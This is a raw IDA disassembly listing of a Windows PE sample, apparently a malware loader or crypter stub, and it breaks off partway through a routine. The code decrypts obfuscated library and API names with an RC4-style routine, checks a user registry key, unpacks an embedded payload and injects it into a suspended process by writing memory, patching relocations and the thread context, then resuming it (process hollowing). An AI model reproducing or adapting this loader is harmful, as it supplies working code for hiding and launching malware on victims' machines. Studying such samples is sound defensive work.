;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 56265328E36FFA09DB1664F4ED3B5DB1
; File Name : u:\work\56265328e36ffa09db1664f4ed3b5db1_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000D40 ( 3392.)
; Section size in file : 00000E00 ( 3584.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401000(SIZE_T dwBytes)
sub_401000 proc near ; CODE XREF: sub_40102B+12�p
; sub_401160+12A�p ...
dwBytes = dword ptr 4
push esi
push edi
push [esp+8+dwBytes] ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov ecx, [esp+8+dwBytes]
mov esi, ecx
mov edx, eax
shr ecx, 2
xor eax, eax
mov edi, edx
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
pop edi
mov eax, edx
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40102B proc near ; CODE XREF: sub_4017A6+38�p
; sub_4017A6+66�p ...
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 110h
mov eax, [ebp+arg_8]
lea eax, [eax+eax*4]
shl eax, 1
push eax ; dwBytes
call sub_401000
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz short loc_40104C
leave
retn
; ---------------------------------------------------------------------------
loc_40104C: ; CODE XREF: sub_40102B+1D�j
xor eax, eax
loc_40104E: ; CODE XREF: sub_40102B+30�j
mov [ebp+eax+var_110], al
inc eax
cmp eax, 0FFh
jle short loc_40104E
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push esi
push edi
mov esi, 100h
loc_40106D: ; CODE XREF: sub_40102B+94�j
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
loc_401073: ; CODE XREF: sub_40102B+4D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401073
sub eax, ecx
mov edi, eax
mov eax, [ebp+var_4]
xor edx, edx
div edi
mov ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
lea ecx, [ebp+ecx+var_110]
mov bl, [ecx]
mov edi, esi
movsx edx, byte ptr [edx+eax]
add edx, [ebp+var_8]
movzx eax, bl
add eax, edx
cdq
idiv edi
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov [eax], bl
jle short loc_40106D
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jle short loc_401133
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
mov [ebp+var_10], eax
loc_4010D7: ; CODE XREF: sub_40102B+106�j
mov eax, [ebp+var_4]
cdq
mov ecx, esi
idiv ecx
mov edi, esi
lea ecx, [ebp+edx+var_110]
mov bl, [ecx]
movzx eax, bl
add eax, [ebp+var_8]
cdq
idiv edi
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov edx, [ebp+var_C]
mov [eax], bl
mov eax, [ebp+var_4]
lea edi, [eax+edx]
movzx eax, byte ptr [ecx]
movzx ecx, bl
add eax, ecx
cdq
mov ecx, esi
idiv ecx
mov ecx, [ebp+var_10]
mov al, [ebp+edx+var_110]
xor al, [ecx+edi]
inc [ebp+var_4]
mov [edi], al
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4010D7
loc_401133: ; CODE XREF: sub_40102B+A1�j
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_40102B endp
; =============== S U B R O U T I N E =======================================
sub_40113B proc near ; CODE XREF: sub_401160+4F�p
; sub_401160+A0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_40115F
mov ecx, [esp+arg_0]
mov edx, dword_40326C
add ecx, edx
loc_40114F: ; CODE XREF: sub_40113B+22�j
mov dl, [ecx+eax]
mov byte_4032F0[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_40114F
locret_40115F: ; CODE XREF: sub_40113B+6�j
retn
sub_40113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401160 proc near ; CODE XREF: start+53�p
var_138 = byte ptr -138h
var_58 = byte ptr -58h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_12 = word ptr -12h
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 138h
mov eax, dword_40326C
push ebx
mov bl, [eax]
mov byte_403288, bl
mov cl, [eax+1]
mov byte_4032E0, cl
mov al, [eax+2]
neg byte_4032E0
push esi
mov esi, dword_4312BC
neg bl
neg al
cmp esi, 40h
mov byte_403288, bl
mov byte_403268, al
jnb short loc_4011AB
xor al, al
jmp loc_401310
; ---------------------------------------------------------------------------
loc_4011AB: ; CODE XREF: sub_401160+42�j
push 40h
push 3
call sub_40113B
pop ecx
pop ecx
mov byte_403330, 0
xor esi, esi
loc_4011BF: ; CODE XREF: sub_401160+75�j
mov cl, byte_4032E0
lea eax, dword_4032F1[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_4011BF
push edi
push 10h
pop ecx
mov esi, offset byte_4032F0
lea edi, [ebp+var_58]
rep movsd
mov eax, [ebp+var_1C]
lea ecx, [eax+18h]
cmp dword_4312BC, ecx
jnb short loc_4011FA
loc_4011F3: ; CODE XREF: sub_401160+DE�j
xor al, al
jmp loc_40130F
; ---------------------------------------------------------------------------
loc_4011FA: ; CODE XREF: sub_401160+91�j
add eax, 3
push 18h
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_403308, 0
xor esi, esi
loc_401210: ; CODE XREF: sub_401160+C6�j
mov cl, byte_4032E0
lea eax, dword_4032F1[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401210
push 6
pop ecx
mov esi, offset byte_4032F0
lea edi, [ebp+var_18]
rep movsd
mov esi, 0E0h
cmp [ebp+var_4], si
jnz short loc_4011F3
mov eax, [ebp+var_1C]
add eax, 1Bh
push esi
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_4033D0, 0
xor edi, edi
loc_401258: ; CODE XREF: sub_401160+10D�j
mov cl, byte_4032E0
lea eax, dword_4032F1[edi]
add [eax-1], bl
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_401258
movzx eax, [ebp+var_12]
push 38h
pop ecx
mov esi, offset byte_4032F0
lea edi, [ebp+var_138]
rep movsd
lea esi, [eax+eax*4]
shl esi, 3
push esi ; dwBytes
call sub_401000
mov ebx, eax
mov eax, [ebp+var_1C]
add eax, 0FBh
push esi
push eax
call sub_40113B
add esp, 0Ch
xor ecx, ecx
test esi, esi
mov byte_4032F0[esi], 0
jbe short loc_4012CD
loc_4012B0: ; CODE XREF: sub_401160+16B�j
mov dl, byte_403288
lea eax, dword_4032F1[ecx]
add [eax-1], dl
mov dl, byte_4032E0
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_4012B0
loc_4012CD: ; CODE XREF: sub_401160+14E�j
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F0
mov edi, ebx
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov edi, [ebp+arg_0]
push 10h
pop ecx
push 6
lea esi, [ebp+var_58]
rep movsd
mov edi, [ebp+arg_4]
pop ecx
lea esi, [ebp+var_18]
rep movsd
mov edi, [ebp+arg_8]
push 38h
pop ecx
lea esi, [ebp+var_138]
rep movsd
mov [eax], ebx
mov al, 1
loc_40130F: ; CODE XREF: sub_401160+95�j
pop edi
loc_401310: ; CODE XREF: sub_401160+46�j
pop esi
pop ebx
leave
retn
sub_401160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401314 proc near ; CODE XREF: start+75�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_401331
lea ecx, [eax+1]
imul ecx, esi
loc_401331: ; CODE XREF: sub_401314+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_40136B
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_401347: ; CODE XREF: sub_401314+53�j
mov edi, [ebx]
test edi, edi
jz short loc_401361
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_40135B
add ecx, edi
jmp short loc_401361
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401314+41�j
inc eax
imul eax, esi
add ecx, eax
loc_401361: ; CODE XREF: sub_401314+37�j
; sub_401314+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_401347
pop edi
pop ebx
loc_40136B: ; CODE XREF: sub_401314+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_401314 endp
; =============== S U B R O U T I N E =======================================
sub_401370 proc near ; CODE XREF: sub_40138A+AA�p
; sub_40138A:loc_4014BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_401383
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_401383: ; CODE XREF: sub_401370+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_401370 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40138A proc near ; CODE XREF: start+A8�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword_40326C
push ebx
mov bl, [eax]
mov byte_403288, bl
mov cl, [eax+1]
mov byte_4032E0, cl
mov al, [eax+2]
neg byte_4032E0
neg al
mov byte_403268, al
mov eax, [ebp+arg_C]
neg bl
push esi
mov byte_403288, bl
mov esi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
push edi
jle short loc_4013E4
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_4013D6: ; CODE XREF: sub_40138A+58�j
mov edx, [ecx]
cmp edx, esi
jnb short loc_4013DE
mov esi, edx
loc_4013DE: ; CODE XREF: sub_40138A+50�j
add ecx, 28h
dec eax
jnz short loc_4013D6
loc_4013E4: ; CODE XREF: sub_40138A+44�j
push esi
push 3
call sub_40113B
pop ecx
xor edi, edi
test esi, esi
pop ecx
mov byte_4032F0[esi], 0
jbe short loc_401412
loc_4013FB: ; CODE XREF: sub_40138A+86�j
mov cl, byte_4032E0
lea eax, dword_4032F1[edi]
add [eax-1], bl
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4013FB
loc_401412: ; CODE XREF: sub_40138A+6F�j
mov edi, [ebp+arg_14]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F0
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [eax+3Ch]
call sub_401370
add eax, [ebp+arg_14]
and [ebp+var_4], 0
mov [ebp+arg_14], eax
mov eax, [ebp+arg_4]
add esp, 8
cmp word ptr [eax+6], 0
jbe loc_4014E0
mov ebx, [ebp+arg_10]
add ebx, 8
loc_40145A: ; CODE XREF: sub_40138A+150�j
mov esi, [ebx+8]
test esi, esi
mov eax, [ebx]
jbe short loc_4014B9
cmp esi, eax
jbe short loc_401469
mov esi, eax
loc_401469: ; CODE XREF: sub_40138A+DB�j
mov eax, [ebx+0Ch]
add eax, 3
push esi
push eax
call sub_40113B
pop ecx
xor eax, eax
test esi, esi
pop ecx
mov byte_4032F0[esi], 0
jbe short loc_401496
loc_401485: ; CODE XREF: sub_40138A+10A�j
mov cl, byte_403268
add byte_4032F0[eax], cl
inc eax
cmp eax, esi
jb short loc_401485
loc_401496: ; CODE XREF: sub_40138A+F9�j
mov edi, [ebp+arg_14]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F0
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [ebx]
jmp short loc_4014BF
; ---------------------------------------------------------------------------
loc_4014B9: ; CODE XREF: sub_40138A+D7�j
test eax, eax
jz short loc_4014CA
push ecx
push eax
loc_4014BF: ; CODE XREF: sub_40138A+12D�j
call sub_401370
add esp, 8
add [ebp+arg_14], eax
loc_4014CA: ; CODE XREF: sub_40138A+131�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+var_4]
add ebx, 28h
cmp [ebp+var_4], eax
jl loc_40145A
loc_4014E0: ; CODE XREF: sub_40138A+C4�j
pop edi
pop esi
mov al, 1
pop ebx
leave
retn
sub_40138A endp
; =============== S U B R O U T I N E =======================================
sub_4014E7 proc near ; CODE XREF: sub_40162A+C7�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_8]
mov eax, [ecx+88h]
test eax, eax
jz short locret_401556
cmp dword ptr [ecx+8Ch], 0
jz short locret_401556
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [ecx+1Ch]
add eax, edx
cmp dword ptr [eax+4], 0
jz short loc_401555
push ebx
push edi
loc_401514: ; CODE XREF: sub_4014E7+6A�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
test ecx, ecx
lea edi, [eax+8]
jle short loc_40154B
mov ebx, ecx
loc_401525: ; CODE XREF: sub_4014E7+62�j
xor edx, edx
mov dx, [edi]
mov ecx, edx
and ecx, 0FFFh
add ecx, [esp+0Ch+arg_10]
and dx, 0F000h
add ecx, [eax]
cmp dx, 3000h
jnz short loc_401546
add [ecx], esi
loc_401546: ; CODE XREF: sub_4014E7+5B�j
inc edi
inc edi
dec ebx
jnz short loc_401525
loc_40154B: ; CODE XREF: sub_4014E7+3A�j
cmp dword ptr [edi+4], 0
mov eax, edi
jnz short loc_401514
pop edi
pop ebx
loc_401555: ; CODE XREF: sub_4014E7+29�j
pop esi
locret_401556: ; CODE XREF: sub_4014E7+C�j
; sub_4014E7+15�j
retn
sub_4014E7 endp
; =============== S U B R O U T I N E =======================================
sub_401557 proc near ; CODE XREF: sub_40156F+81�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push offset dword_40329C
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
call dword_431298
retn
sub_401557 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40156F proc near ; CODE XREF: start+C5�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 48h
push esi
mov esi, [ebp+arg_4]
push edi
push 10h
pop ecx
xor edx, edx
push esi
xor eax, eax
mov [ebp+var_48], edx
lea edi, [ebp+var_44]
rep stosd
lea eax, [ebp+var_48]
push eax
push edx
push edx
push 4
push edx
push edx
push edx
push [ebp+arg_0]
push edx
call dword_4312A4
test eax, eax
jz short loc_401607
mov edi, [ebp+arg_C]
push ebx
push edi
mov dword ptr [edi], 10007h
push dword ptr [esi+4]
call dword_4032D0
mov ebx, [ebp+arg_10]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call dword_403284
mov edi, [ebx]
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015D7: ; CODE XREF: sub_40156F+8B�j
cmp dword_4032AC, 10000h
jz short loc_4015FC
add edi, dword_4032A8
loc_4015E9: ; CODE XREF: sub_40156F+66�j
push 1Ch
push edi
push dword ptr [esi]
push 0
call sub_401557
add esp, 10h
test eax, eax
jnz short loc_4015D7
loc_4015FC: ; CODE XREF: sub_40156F+72�j
sub edi, [ebx]
xor eax, eax
mov [ebx+4], edi
inc eax
pop ebx
jmp short loc_401609
; ---------------------------------------------------------------------------
loc_401607: ; CODE XREF: sub_40156F+32�j
xor eax, eax
loc_401609: ; CODE XREF: sub_40156F+96�j
pop edi
pop esi
leave
retn
sub_40156F endp
; =============== S U B R O U T I N E =======================================
sub_40160D proc near ; CODE XREF: sub_40162A+90�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_401627
cmp dword ptr [eax+8Ch], 0
jz short loc_401627
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401627: ; CODE XREF: sub_40160D+B�j
; sub_40160D+14�j
xor eax, eax
retn
sub_40160D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40162A proc near ; CODE XREF: start+117�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_30 = dword ptr 38h
arg_D4 = dword ptr 0DCh
arg_E0 = dword ptr 0E8h
arg_2FC = dword ptr 304h
arg_300 = dword ptr 308h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push ebx
push esi
push edi
mov edi, [ebp+arg_2FC]
cmp [eax+1Ch], edi
mov esi, 3000h
jnz short loc_40166B
mov eax, [ebp+arg_300]
cmp [ebp+arg_18], eax
ja short loc_40166B
mov ebx, [ebp+arg_20]
lea ecx, [ebp+arg_300]
push ecx
push 40h
push eax
push edi
push ebx
mov dword_4312C0, edi
call dword_4312AC
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_40166B: ; CODE XREF: sub_40162A+17�j
; sub_40162A+22�j
mov ebx, [ebp+arg_20]
push edi
push ebx
mov dword_4032D4, ebx
mov dword_43129C, edi
call dword_403280
test eax, eax
jnz short loc_40168D
mov byte ptr [ebp+arg_300+3], 1
loc_40168D: ; CODE XREF: sub_40162A+5A�j
cmp byte ptr [ebp+arg_300+3], 1
jnz short loc_4016AE
mov eax, [ebp+arg_C]
push 40h
push esi
push [ebp+arg_18]
push dword ptr [eax+1Ch]
push ebx
call dword_403274
mov dword_4312C0, eax
loc_4016AE: ; CODE XREF: sub_40162A+3F�j
; sub_40162A+6A�j
cmp dword_4312C0, 0
jnz short loc_401709
push [ebp+arg_C]
call sub_40160D
add esp, 4
test eax, eax
jz short loc_401702
push 40h
push esi
push [ebp+arg_18]
push 0
push ebx
call dword_403274
test eax, eax
mov dword_4312C0, eax
jz short loc_401702
mov esi, [ebp+arg_C]
push 0
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4014E7
add esp, 1Ch
cmp dword_4312C0, 0
jnz short loc_40170C
loc_401702: ; CODE XREF: sub_40162A+9A�j
; sub_40162A+B2�j
xor eax, eax
loc_401704: ; CODE XREF: sub_40162A+154�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401709: ; CODE XREF: sub_40162A+8B�j
mov esi, [ebp+arg_C]
loc_40170C: ; CODE XREF: sub_40162A+D6�j
mov eax, [ebp+arg_D4]
push 0
push 4
push offset dword_4312C0
add eax, 8
push eax
push ebx
call dword_4032DC
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_4312C0
mov edx, [ebp+arg_14]
mov [eax+edx+34h], ecx
mov eax, dword_4312C0
cmp eax, edi
mov [ebp+arg_30], 10007h
jnz short loc_401757
mov eax, [esi+10h]
add eax, [esi+1Ch]
mov [ebp+arg_E0], eax
jmp short loc_401762
; ---------------------------------------------------------------------------
loc_401757: ; CODE XREF: sub_40162A+11D�j
mov ecx, [esi+10h]
add ecx, eax
mov [ebp+arg_E0], ecx
loc_401762: ; CODE XREF: sub_40162A+12B�j
mov eax, [ebp+arg_24]
lea ecx, [ebp+arg_30]
push ecx
push eax
mov dword_4312B0, ebx
mov dword_40328C, eax
call dword_4032E4
xor eax, eax
inc eax
jmp short loc_401704
sub_40162A endp
; =============== S U B R O U T I N E =======================================
sub_401780 proc near ; CODE XREF: start+14C�p
push dword_40328C
mov byte_4312B4, 1
call dword_403270
retn
sub_401780 endp
; =============== S U B R O U T I N E =======================================
sub_401794 proc near ; CODE XREF: sub_401AFE+5B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
mov dword_4312A0, eax
retn
sub_401794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017A6 proc near ; CODE XREF: start+11�p
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 7
pop ecx
xor eax, eax
mov [ebp+var_2C], 0
lea edi, [ebp+var_2B]
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
push eax
push 13h
xor ebx, ebx
push offset dword_403104
mov esi, offset aGbvcnfisugd ; "gbvcnfisugd"
inc ebx
push esi
mov [ebp+var_8], 1Fh
mov [ebp+var_C], ebx
call sub_40102B
add esp, 0Ch
push eax
push 80000001h
call dword_4032CC
test eax, eax
jnz short loc_40183E
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push 10h
push offset dword_4030CC
push esi
call sub_40102B
add esp, 0Ch
push eax
push [ebp+var_4]
call dword_4312B8
test eax, eax
jnz short loc_401835
push 2
mov edi, offset dword_402010
lea esi, [ebp+var_2C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_401835
xor bl, bl
loc_401835: ; CODE XREF: sub_4017A6+7A�j
; sub_4017A6+8B�j
push [ebp+var_4]
call dword_403278
loc_40183E: ; CODE XREF: sub_4017A6+4E�j
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
sub_4017A6 endp
; =============== S U B R O U T I N E =======================================
sub_401845 proc near ; CODE XREF: start+C�p
hModule = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push 0Ch
push offset aAKiUgGvA ; "a\\kiuGV'"
mov esi, offset aGbvcnfisugd ; "gbvcnfisugd"
push esi
call sub_40102B
mov edi, ds:LoadLibraryA
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 0Ch
push offset aKOfepgGvA ; "K}OFPGV'"
push esi
mov [esp+20h+hModule], eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 9
push offset dword_40317C
push esi
mov ebx, eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 11h
push offset dword_4031B8
push esi
mov ebp, eax
call sub_40102B
mov edi, ds:GetProcAddress
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 0Eh
push offset dword_403000
push esi
mov dword_4032B8, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 12h
push offset aWjtEltiW8vjl ; "wjT\\l\nW8\\^"
push esi
mov dword_403274, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset aRZkmsusW2 ; "r}ZkS\"W2"
push esi
mov dword_4032DC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 0Bh
push offset dword_4031F8
push esi
mov dword_403278, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 14h
push offset aZohfnR ; "zohF]"
push esi
mov dword_403290, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 0Ch
push offset aRNNyWX ; "r}N]Y\x1BW*"
push esi
mov dword_403280, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 13h
push offset dword_403198
push esi
mov dword_403270, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 0Eh
push offset dword_403048
push esi
mov dword_4032BC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset dword_4031AC
push esi
mov dword_4312A4, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset dword_4030E0
push esi
mov dword_403298, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Ch
push offset dword_403118
push esi
mov dword_4032E4, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 8
push offset dword_4031CC
push esi
mov dword_4032C8, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset dword_403068
push esi
mov dword_4032D8, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 1Eh
push offset dword_4031D8
push esi
mov dword_4032D0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 10h
push offset dword_403090
push esi
mov dword_403294, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 0Bh
push offset dword_403230
push esi
mov dword_4312B8, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 0Eh
push offset dword_403258
push esi
mov dword_4032CC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 11h
push offset dword_40307C
push esi
mov dword_431298, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset dword_4030A4
push esi
mov dword_403284, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 12h
push offset dword_403010
push esi
mov dword_4312AC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
pop edi
pop esi
pop ebp
mov dword_4032E8, eax
mov al, 1
pop ebx
pop ecx
retn
sub_401845 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401ABA proc near ; CODE XREF: sub_401AFE+CA�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_C]
imul esi, 64h
push edi
inc esi
push esi ; dwBytes
call sub_401000
mov edi, eax
test edi, edi
pop ecx
jz short loc_401AFA
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push 2
call dword_403294
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push esi
push edi
push 2
call dword_4032BC
mov eax, edi
loc_401AFA: ; CODE XREF: sub_401ABA+19�j
pop edi
pop esi
leave
retn
sub_401ABA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AFE proc near ; CODE XREF: start+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call dword_403298
push ebx
push eax
mov dword_40327C, eax
call dword_403290
mov dword_4312BC, eax
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
push dword_4312BC
mov dword_40326C, eax
push eax
push dword_40327C
call dword_4032D8
push [ebp+var_4]
call sub_401794
mov eax, [ebp+var_4]
pop ecx
lea edx, [eax-1800h]
xor ecx, ecx
test edx, edx
jbe short loc_401B91
